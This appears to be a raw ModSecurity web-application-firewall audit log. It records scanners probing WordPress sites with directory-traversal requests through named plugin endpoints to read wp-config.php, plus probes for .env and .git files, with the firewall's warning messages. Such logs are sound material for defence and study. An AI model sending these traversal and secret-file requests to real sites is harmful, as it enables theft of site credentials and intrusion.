gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --432b5670-Z-- --33e3e443-A-- [15/Jun/2025:04:44:19.353591 +0530] aE4CS4-PHe08tXRwhpDuUQAAAAQ 2.58.56.137 43520 127.0.0.1 7081 --33e3e443-B-- GET //wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php HTTP/1.0 Host: www.medikonindia.com X-Real-IP: 2.58.56.137 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 --33e3e443-F-- HTTP/1.1 302 Found X-Powered-By: PHP/8.3.22 location: https://safe-load.gotmls.net/report.php?ver=4.23.81&attack[]=FW_Traversal&SERVER_REMOTE_ADDR=2.58.56.137&SERVER_HTTP_HOST=www.medikonindia.com&SERVER_REQUEST_URI=%2F%2Fwp-content%2Fplugins%2Fwptf-image-gallery%2Flib-mbox%2Fajax_load.php%3Furl%3D..%2F..%2F..%2F..%2Fwp-config.php&SERVER_HTTP_USER_AGENT=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A58.0%29+Gecko%2F20100101+Firefox%2F58.0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --33e3e443-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Matched phrase "wp-config.php" at ARGS:url. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.medikonindia.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:url: ../../../../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.medikonindia.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "aE4CS4-PHe08tXRwhpDuUQAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at ARGS:url. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.medikonindia.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:url: ../../../../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.medikonindia.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "aE4CS4-PHe08tXRwhpDuUQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/medikonindia.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942859130879 222789 (- - -) Stopwatch2: 1749942859130879 222789; combined=2476, p1=358, p2=1995, p3=0, p4=0, p5=123, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --33e3e443-Z-- --ca310b59-A-- [15/Jun/2025:04:44:19.996055 +0530] aE4CS54hb3-ZG-auIyDYSAAAAAg 2.58.56.137 44578 127.0.0.1 7081 --ca310b59-B-- GET //wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php HTTP/1.0 Host: www.medikonindia.com X-Real-IP: 2.58.56.137 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 --ca310b59-F-- HTTP/1.1 302 Found X-Powered-By: PHP/8.3.22 location: https://safe-load.gotmls.net/report.php?ver=4.23.81&attack[]=FW_Traversal&SERVER_REMOTE_ADDR=2.58.56.137&SERVER_HTTP_HOST=www.medikonindia.com&SERVER_REQUEST_URI=%2F%2Fwp-content%2Fplugins%2Frecent-backups%2Fdownload-file.php%3Ffile_link%3D..%2F..%2F..%2Fwp-config.php&SERVER_HTTP_USER_AGENT=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A58.0%29+Gecko%2F20100101+Firefox%2F58.0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --ca310b59-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Matched phrase "wp-config.php" at ARGS:file_link. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.medikonindia.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:file_link: ../../../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.medikonindia.com"] [uri "/wp-content/plugins/recent-backups/download-file.php"] [unique_id "aE4CS54hb3-ZG-auIyDYSAAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at ARGS:file_link. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.medikonindia.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:file_link: ../../../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.medikonindia.com"] [uri "/wp-content/plugins/recent-backups/download-file.php"] [unique_id "aE4CS54hb3-ZG-auIyDYSAAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/medikonindia.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942859781115 215001 (- - -) Stopwatch2: 1749942859781115 215001; combined=2572, p1=417, p2=2006, p3=0, p4=0, p5=149, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ca310b59-Z-- --9918e106-A-- [15/Jun/2025:04:44:20.639585 +0530] aE4CTBkoa9Lad8nP7KN8YgAAABA 2.58.56.137 44584 127.0.0.1 7081 --9918e106-B-- GET //wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php HTTP/1.0 Host: www.medikonindia.com X-Real-IP: 2.58.56.137 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 --9918e106-F-- HTTP/1.1 302 Found X-Powered-By: PHP/8.3.22 location: https://safe-load.gotmls.net/report.php?ver=4.23.81&attack[]=FW_Traversal&SERVER_REMOTE_ADDR=2.58.56.137&SERVER_HTTP_HOST=www.medikonindia.com&SERVER_REQUEST_URI=%2F%2Fwp-content%2Fplugins%2Fsimple-image-manipulator%2Fcontroller%2Fdownload.php%3Ffilepath%3D..%2F..%2F..%2Fwp-config.php&SERVER_HTTP_USER_AGENT=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A58.0%29+Gecko%2F20100101+Firefox%2F58.0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --9918e106-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Matched phrase "wp-config.php" at ARGS:filepath. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.medikonindia.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:filepath: ../../../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.medikonindia.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "aE4CTBkoa9Lad8nP7KN8YgAAABA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at ARGS:filepath. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.medikonindia.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:filepath: ../../../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.medikonindia.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "aE4CTBkoa9Lad8nP7KN8YgAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/medikonindia.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942860425076 214580 (- - -) Stopwatch2: 1749942860425076 214580; combined=2507, p1=433, p2=1939, p3=0, p4=0, p5=135, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9918e106-Z-- --edbf0250-A-- [15/Jun/2025:04:44:21.288639 +0530] aE4CTZ4hb3-ZG-auIyDYSQAAAAg 2.58.56.137 44600 127.0.0.1 7081 --edbf0250-B-- GET //wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php HTTP/1.0 Host: www.medikonindia.com X-Real-IP: 2.58.56.137 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 --edbf0250-F-- HTTP/1.1 302 Found X-Powered-By: PHP/8.3.22 location: https://safe-load.gotmls.net/report.php?ver=4.23.81&attack[]=FW_Traversal&SERVER_REMOTE_ADDR=2.58.56.137&SERVER_HTTP_HOST=www.medikonindia.com&SERVER_REQUEST_URI=%2F%2Fwp-content%2Fplugins%2Fgoogle-mp3-audio-player%2Fdirect_download.php%3Ffile%3D..%2F..%2F..%2Fwp-config.php&SERVER_HTTP_USER_AGENT=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A58.0%29+Gecko%2F20100101+Firefox%2F58.0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --edbf0250-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Matched phrase "wp-config.php" at ARGS:file. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.medikonindia.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:file: ../../../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.medikonindia.com"] [uri "/wp-content/plugins/google-mp3-audio-player/direct_download.php"] [unique_id "aE4CTZ4hb3-ZG-auIyDYSQAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at ARGS:file. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.medikonindia.com|F|2"] [data "Matched Data: wp-config.php found within ARGS:file: ../../../wp-config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.medikonindia.com"] [uri "/wp-content/plugins/google-mp3-audio-player/direct_download.php"] [unique_id "aE4CTZ4hb3-ZG-auIyDYSQAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/medikonindia.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942861058147 230551 (- - -) Stopwatch2: 1749942861058147 230551; combined=3418, p1=522, p2=2722, p3=0, p4=0, p5=174, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --edbf0250-Z-- --4378d044-A-- [15/Jun/2025:04:44:37.885476 +0530] aE4CXRkoa9Lad8nP7KN8bgAAABA 52.169.149.155 36580 127.0.0.1 7080 --4378d044-B-- GET /wp-includes/css/wp-config.php HTTP/1.0 Host: www.satyakalra.com X-Real-IP: 52.169.149.155 X-Accel-Internal: /internal-nginx-static-location Connection: close --4378d044-F-- HTTP/1.1 404 Not Found Last-Modified: Sat, 05 Oct 2024 07:56:15 GMT ETag: "328-623b61f41ac0f" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --4378d044-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.satyakalra.com"] [uri "/wp-includes/css/wp-config.php"] [unique_id "aE4CXRkoa9Lad8nP7KN8bgAAABA"] Stopwatch: 1749942877882302 3223 (- - -) Stopwatch2: 1749942877882302 3223; combined=1906, p1=435, p2=1417, p3=0, p4=0, p5=53, sr=117, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4378d044-Z-- --0c44574e-A-- [15/Jun/2025:04:45:27.813262 +0530] aE4Cj7dgU2RqPO-R9-XMvwAAAA0 52.169.149.155 60062 127.0.0.1 7080 --0c44574e-B-- GET /wp-config.php HTTP/1.0 Host: www.satyakalra.com X-Real-IP: 52.169.149.155 X-Accel-Internal: /internal-nginx-static-location Connection: close --0c44574e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Connection: close Content-Type: text/html; charset=UTF-8 --0c44574e-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.satyakalra.com"] [uri "/wp-config.php"] [unique_id "aE4Cj7dgU2RqPO-R9-XMvwAAAA0"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'Primary script unknown' Apache-Handler: proxy:unix:/var/www/vhosts/system/satyakalra.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942927809776 3547 (- - -) Stopwatch2: 1749942927809776 3547; combined=1809, p1=349, p2=1274, p3=54, p4=51, p5=80, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0c44574e-Z-- --d5370b7d-A-- [15/Jun/2025:04:45:32.051501 +0530] aE4CkieXHcLENIHhuFcoSAAAAAU 198.71.51.75 37628 127.0.0.1 7081 --d5370b7d-B-- GET /.git/branches/ HTTP/1.0 Host: www.futuronomics.com X-Real-IP: 198.71.51.75 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: WP Rocket/Preload Accept: */* Accept-Encoding: deflate, gzip, br, zstd --d5370b7d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Link: <https://www.futuronomics.com/wp-json/>; rel="https://api.w.org/", <https://www.futuronomics.com/wp-json/wp/v2/media/4005>; rel="alternate"; title="JSON"; type="application/json", <https://www.futuronomics.com/?p=4005>; rel=shortlink Set-Cookie: wpr_guest_token=522973571d65fc002e670c3f4e82ab5fff690a20e3911289063d829d3d196172; expires=Sun, 15 Jun 2025 00:15:31 GMT; Max-Age=3600; path=/; secure; HttpOnly Vary: Accept-Encoding Last-Modified: Sat, 14 Jun 2025 23:15:32 GMT Content-Encoding: gzip Content-Length: 20865 Connection: close Content-Type: text/html; charset=UTF-8 --d5370b7d-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.futuronomics.com"] [uri "/.git/branches/"] [unique_id "aE4CkieXHcLENIHhuFcoSAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/futuronomics.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749942930419984 1631610 (- - -) Stopwatch2: 1749942930419984 1631610; combined=1602, p1=353, p2=1158, p3=0, p4=0, p5=90, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d5370b7d-Z-- --85379673-A-- [15/Jun/2025:04:47:13.363259 +0530] aE4C-I-PHe08tXRwhpDusAAAAAQ 185.177.72.2 39694 127.0.0.1 7081 --85379673-B-- GET /.env.production HTTP/1.0 Host: www.tryons.ai X-Real-IP: 185.177.72.2 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.10 aiohttp/3.12.13 --85379673-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tryons.ai/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --85379673-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tryons.ai"] [uri "/.env.production"] [unique_id "aE4C-I-PHe08tXRwhpDusAAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tryons.ai/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749943032135483 1227842 (- - -) Stopwatch2: 1749943032135483 1227842; combined=1860, p1=338, p2=1425, p3=0, p4=0, p5=96, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --85379673-Z-- --1745906a-A-- [15/Jun/2025:04:47:13.427730 +0530] aE4C-NC7wXmuvKRT4TopvQAAAA8 185.177.72.2 39762 127.0.0.1 7081 --1745906a-B-- GET /docker/.env HTTP/1.0 Host: www.tryons.ai X-Real-IP: 185.177.72.2 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.10 aiohttp/3.12.13 --1745906a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tryons.ai/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --1745906a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tryons.ai"] [uri "/docker/.env"] [unique_id "aE4C-NC7wXmuvKRT4TopvQAAAA8"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tryons.ai/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749943032746834 680957 (- - -) Stopwatch2: 1749943032746834 680957; combined=1945, p1=461, p2=1397, p3=0, p4=0, p5=86, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1745906a-Z-- --9afd1c0f-A-- [15/Jun/2025:04:47:13.732559 +0530] aE4C-PBViRrxRfhQ2snbPQAAAAE 185.177.72.2 39680 127.0.0.1 7081 --9afd1c0f-B-- GET /.env.testing HTTP/1.0 Host: www.tryons.ai X-Real-IP: 185.177.72.2 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.10 aiohttp/3.12.13 --9afd1c0f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tryons.ai/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --9afd1c0f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tryons.ai"] [uri "/.env.testing"] [unique_id "aE4C-PBViRrxRfhQ2snbPQAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tryons.ai/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749943032134893 1597728 (- - -) Stopwatch2: 1749943032134893 1597728; combined=1802, p1=404, p2=1307, p3=0, p4=0, p5=90, sr=117, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9afd1c0f-Z-- --b3f60539-A-- [15/Jun/2025:04:47:13.966152 +0530] aE4C-Rkoa9Lad8nP7KN8wgAAABA 185.177.72.2 39786 127.0.0.1 7081 --b3f60539-B-- GET /.git/HEAD HTTP/1.0 Host: www.tryons.ai X-Real-IP: 185.177.72.2 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.10 aiohttp/3.12.13 --b3f60539-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tryons.ai/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --b3f60539-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tryons.ai"] [uri "/.git/HEAD"] [unique_id "aE4C-Rkoa9Lad8nP7KN8wgAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tryons.ai/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749943033324088 642127 (- - -) Stopwatch2: 1749943033324088 642127; combined=1568, p1=350, p2=1128, p3=0, p4=0, p5=89, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b3f60539-Z-- --b1334e54-A-- [15/Jun/2025:04:47:13.996104 +0530] aE4C-XAK-xWqAl1k3Dz-YgAAAAY 185.177.72.2 39832 127.0.0.1 7081 --b1334e54-B-- GET /.git/index HTTP/1.0 Host: www.tryons.ai X-Real-IP: 185.177.72.2 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.10 aiohttp/3.12.13 --b1334e54-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tryons.ai/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --b1334e54-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tryons.ai"] [uri "/.git/index"] [unique_id "aE4C-XAK-xWqAl1k3Dz-YgAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tryons.ai/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749943033432272 563896 (- - -) Stopwatch2: 1749943033432272 563896; combined=1269, p1=298, p2=862, p3=0, p4=0, p5=108, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b1334e54-Z-- --5f189577-A-- [15/Jun/2025:04:47:14.411008 +0530] aE4C-bhvrRrlmSOg3-93HAAAAAw 185.177.72.2 39864 127.0.0.1 7081 --5f189577-B-- GET /.git/refs/heads/master HTTP/1.0 Host: www.tryons.ai X-Real-IP: 185.177.72.2 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.10 aiohttp/3.12.13 --5f189577-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tryons.ai/wp-json/>; rel="https://api.w.org/" Connection: close 